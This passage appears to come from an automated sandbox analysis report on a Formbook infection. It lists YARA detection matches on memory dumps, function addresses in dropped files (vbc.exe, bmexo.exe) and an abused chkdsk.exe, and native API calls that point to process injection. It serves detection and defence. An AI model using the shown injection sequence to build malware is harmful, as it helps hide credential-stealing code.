          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F218905_2_00F21890
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F296A05_2_00F296A0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F27E885_2_00F27E88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F29C125_2_00F29C12
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2B3F15_2_00F2B3F1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2C3BD5_2_00F2C3BD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F2A1845_2_00F2A184
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00160A2C5_2_00160A2C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040102F6_2_0040102F
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D8FD6_2_0041D8FD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041E99C6_2_0041E99C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040927B6_2_0040927B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041DAD06_2_0041DAD0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_004092806_2_00409280
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040DC206_2_0040DC20
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041EDF46_2_0041EDF4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402D886_2_00402D88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041DEEC6_2_0041DEEC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041E73A6_2_0041E73A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F218906_2_00F21890
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2A1846_2_00F2A184
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2B3F16_2_00F2B3F1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F2C3BD6_2_00F2C3BD
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F29C126_2_00F29C12
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F296A06_2_00F296A0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F27E886_2_00F27E88
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AE0C66_2_009AE0C6
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009DD0056_2_009DD005
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C905A6_2_009C905A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A2D06D6_2_00A2D06D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B30406_2_009B3040
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AE2E96_2_009AE2E9
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A512386_2_00A51238
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A563BF6_2_00A563BF
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D63DB6_2_009D63DB
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009AF3CF6_2_009AF3CF
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B23056_2_009B2305
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B73536_2_009B7353
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009FA37B6_2_009FA37B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C14896_2_009C1489
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009E54856_2_009E5485
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3443E6_2_00A3443E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009ED47D6_2_009ED47D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009CC5F06_2_009CC5F0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B351F6_2_009B351F
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009F65406_2_009F6540
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B46806_2_009B4680
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BE6C16_2_009BE6C1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A526226_2_00A52622
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009FA6346_2_009FA634
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BC7BC6_2_009BC7BC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3579A6_2_00A3579A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009E57C36_2_009E57C3
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A4F8EE6_2_00A4F8EE
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009BC85C6_2_009BC85C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D286D6_2_009D286D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009B29B26_2_009B29B2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A5098E6_2_00A5098E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009C69FE6_2_009C69FE
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3394B6_2_00A3394B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A359556_2_00A35955
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A63A836_2_00A63A83
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A5CBA46_2_00A5CBA4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00A3DBDA6_2_00A3DBDA
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009D7B006_2_009D7B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024412388_2_02441238
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239E2E98_2_0239E2E9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A23058_2_023A2305
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023EA37B8_2_023EA37B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A73538_2_023A7353
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C63DB8_2_023C63DB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239F3CF8_2_0239F3CF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024463BF8_2_024463BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0241D06D8_2_0241D06D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023CD0058_2_023CD005
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B905A8_2_023B905A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A30408_2_023A3040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239E0C68_2_0239E0C6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023EA6348_2_023EA634
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024426228_2_02442622
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A46808_2_023A4680
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AE6C18_2_023AE6C1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AC7BC8_2_023AC7BC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242579A8_2_0242579A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D57C38_2_023D57C3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023DD47D8_2_023DD47D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242443E8_2_0242443E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B14898_2_023B1489
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D54858_2_023D5485
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A351F8_2_023A351F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023E65408_2_023E6540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024205E38_2_024205E3
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023BC5F08_2_023BC5F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02453A838_2_02453A83
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C7B008_2_023C7B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02426BCB8_2_02426BCB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242DBDA8_2_0242DBDA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0244CBA48_2_0244CBA4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023C286D8_2_023C286D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023AC85C8_2_023AC85C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0241F8C48_2_0241F8C4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243F8EE8_2_0243F8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242394B8_2_0242394B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_024259558_2_02425955
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023A29B28_2_023A29B2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B69FE8_2_023B69FE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0244098E8_2_0244098E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D2E2F8_2_023D2E2F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023BEE4C8_2_023BEE4C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023B0F3F8_2_023B0F3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023CDF7C8_2_023CDF7C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242BF148_2_0242BF14
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02412FDC8_2_02412FDC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243CFB18_2_0243CFB1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0242AC5E8_2_0242AC5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023D0D3B8_2_023D0D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023ACD5B8_2_023ACD5B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0243FDDD8_2_0243FDDD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009927B8_2_0009927B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000992808_2_00099280
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AE73A8_2_000AE73A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD8FD8_2_000AD8FD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AE99C8_2_000AE99C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000ADAD08_2_000ADAD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009DC208_2_0009DC20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092D888_2_00092D88
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092D908_2_00092D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AEDF48_2_000AEDF4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000ADEEC8_2_000ADEEC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_00092FB08_2_00092FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0239E2A8 appears 58 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0240F970 appears 84 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 023E3F92 appears 132 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 023E373B appears 248 times
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0239DF5C appears 124 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009F373B appears 186 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009ADF5C appears 94 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00F24599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00F22400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009AE2A8 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 009F3F92 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: String function: 00A1F970 appears 66 times
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A310 NtCreateFile,6_2_0041A310
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A3C0 NtReadFile,6_2_0041A3C0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A440 NtClose,6_2_0041A440
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A4F0 NtAllocateVirtualMemory,6_2_0041A4F0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A30A NtCreateFile,6_2_0041A30A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A43A NtClose,6_2_0041A43A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041A4EA NtAllocateVirtualMemory,6_2_0041A4EA
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A00C4 NtCreateFile,LdrInitializeThunk,6_2_009A00C4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_009A0048
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0078 NtResumeThread,LdrInitializeThunk,6_2_009A0078
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A07AC NtCreateMutant,LdrInitializeThunk,6_2_009A07AC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F9F0 NtClose,LdrInitializeThunk,6_2_0099F9F0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F900 NtReadFile,LdrInitializeThunk,6_2_0099F900
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0099FAD0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0099FAE8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0099FBB8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0099FB68
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0099FC90
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0099FC60
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FD8C NtDelayExecution,LdrInitializeThunk,6_2_0099FD8C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0099FDC0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0099FEA0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0099FED0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FFB4 NtCreateSection,LdrInitializeThunk,6_2_0099FFB4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A10D0 NtOpenProcessToken,6_2_009A10D0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A0060 NtQuerySection,6_2_009A0060
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A01D4 NtSetValueKey,6_2_009A01D4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A010C NtOpenDirectoryObject,6_2_009A010C
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A1148 NtOpenThread,6_2_009A1148
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F8CC NtWaitForSingleObject,6_2_0099F8CC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099F938 NtWriteFile,6_2_0099F938
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_009A1930 NtSetContextThread,6_2_009A1930
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FAB8 NtQueryValueKey,6_2_0099FAB8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FA20 NtQueryInformationFile,6_2_0099FA20
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FA50 NtEnumerateValueKey,6_2_0099FA50
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FBE8 NtQueryVirtualMemory,6_2_0099FBE8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0099FB50 NtCreateKey,6_2_0099FB50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023900C4 NtCreateFile,LdrInitializeThunk,8_2_023900C4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023907AC NtCreateMutant,LdrInitializeThunk,8_2_023907AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk,8_2_0238FAB8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_0238FAE8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_0238FAD0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0238FB68
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FB50 NtCreateKey,LdrInitializeThunk,8_2_0238FB50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_0238FBB8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F900 NtReadFile,LdrInitializeThunk,8_2_0238F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F9F0 NtClose,LdrInitializeThunk,8_2_0238F9F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0238FED0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FFB4 NtCreateSection,LdrInitializeThunk,8_2_0238FFB4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_0238FC60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FD8C NtDelayExecution,LdrInitializeThunk,8_2_0238FD8C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_0238FDC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390078 NtResumeThread,8_2_02390078
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390060 NtQuerySection,8_2_02390060
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02390048 NtProtectVirtualMemory,8_2_02390048
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023910D0 NtOpenProcessToken,8_2_023910D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239010C NtOpenDirectoryObject,8_2_0239010C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391148 NtOpenThread,8_2_02391148
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_023901D4 NtSetValueKey,8_2_023901D4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FA20 NtQueryInformationFile,8_2_0238FA20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FA50 NtEnumerateValueKey,8_2_0238FA50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FBE8 NtQueryVirtualMemory,8_2_0238FBE8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F8CC NtWaitForSingleObject,8_2_0238F8CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238F938 NtWriteFile,8_2_0238F938
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_02391930 NtSetContextThread,8_2_02391930
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FE24 NtWriteVirtualMemory,8_2_0238FE24
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FEA0 NtReadVirtualMemory,8_2_0238FEA0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0238FF34 NtQueueApcThread,8_2_0238FF34
